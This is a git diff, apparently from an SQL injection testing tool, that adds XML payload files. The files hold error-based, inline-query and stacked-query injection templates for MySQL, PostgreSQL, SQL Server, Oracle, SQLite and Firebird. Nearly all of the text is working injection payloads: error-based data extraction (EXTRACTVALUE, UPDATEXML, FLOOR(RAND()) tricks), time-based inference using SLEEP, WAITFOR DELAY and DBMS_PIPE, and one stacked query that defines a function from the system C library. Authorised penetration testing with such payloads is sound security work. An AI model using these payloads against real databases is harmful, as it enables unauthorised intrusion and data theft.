+        <vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+
+    <test>
+        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
+        <request>
+            <payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle error-based - ORDER BY, GROUP BY clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird error-based - ORDER BY clause</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!--
+         TODO: if possible, add payload for SQLite, Microsoft Access
+         and SAP MaxDB - no known techniques at this time
+    -->
+    <!-- End of error-based tests - ORDER BY, GROUP BY clause -->
+</root>
diff --git a/xml/payloads/03_inline_query.xml b/xml/payloads/03_inline_query.xml
new file mode 100644
index 000000000..b49d53834
--- /dev/null
+++ b/xml/payloads/03_inline_query.xml
@@ -0,0 +1,125 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Inline queries tests -->
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of inline queries tests -->
+</root>
diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
new file mode 100644
index 000000000..45ce87a9f
--- /dev/null
+++ b/xml/payloads/04_stacked_queries.xml
@@ -0,0 +1,691 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
